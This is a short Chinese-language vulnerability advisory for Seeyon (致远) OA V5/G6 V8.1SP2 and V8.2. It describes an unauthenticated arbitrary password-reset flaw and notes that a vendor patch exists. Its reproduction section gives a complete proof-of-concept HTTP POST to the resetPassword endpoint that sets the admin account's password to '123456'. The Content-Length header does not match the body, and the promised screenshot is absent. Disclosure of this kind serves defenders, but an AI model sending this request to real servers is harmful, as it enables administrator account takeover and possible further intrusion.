一、致远OA
致远OA是一款企业级办公自动化软件,它提供了一系列的办公自动化解决方案,包括文档管理、流程管理、协同办公、知识管理、人力资源管理等功能。致远OA可以帮助企业实现信息化管理,提高工作效率和管理水平,同时也可以提高企业的竞争力。
二、漏洞描述
致远OA组件存在任意密码修改漏洞的信息,漏洞威胁等级:高危。该漏洞是由于致远OA修改用户密码时收发验证码的接口存在缺陷,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行未授权重置密码攻击,最终越权登录账号并可能进一步实现远程代码执行。
影响范围
V5/G6 V8.1SP2、V8.2
三、漏洞复现
poc:
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.667.76 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 56
{"loginName":"admin","password":"123456"}
截图:
四、修复建议
致远官方已发布修复补丁
致远服务
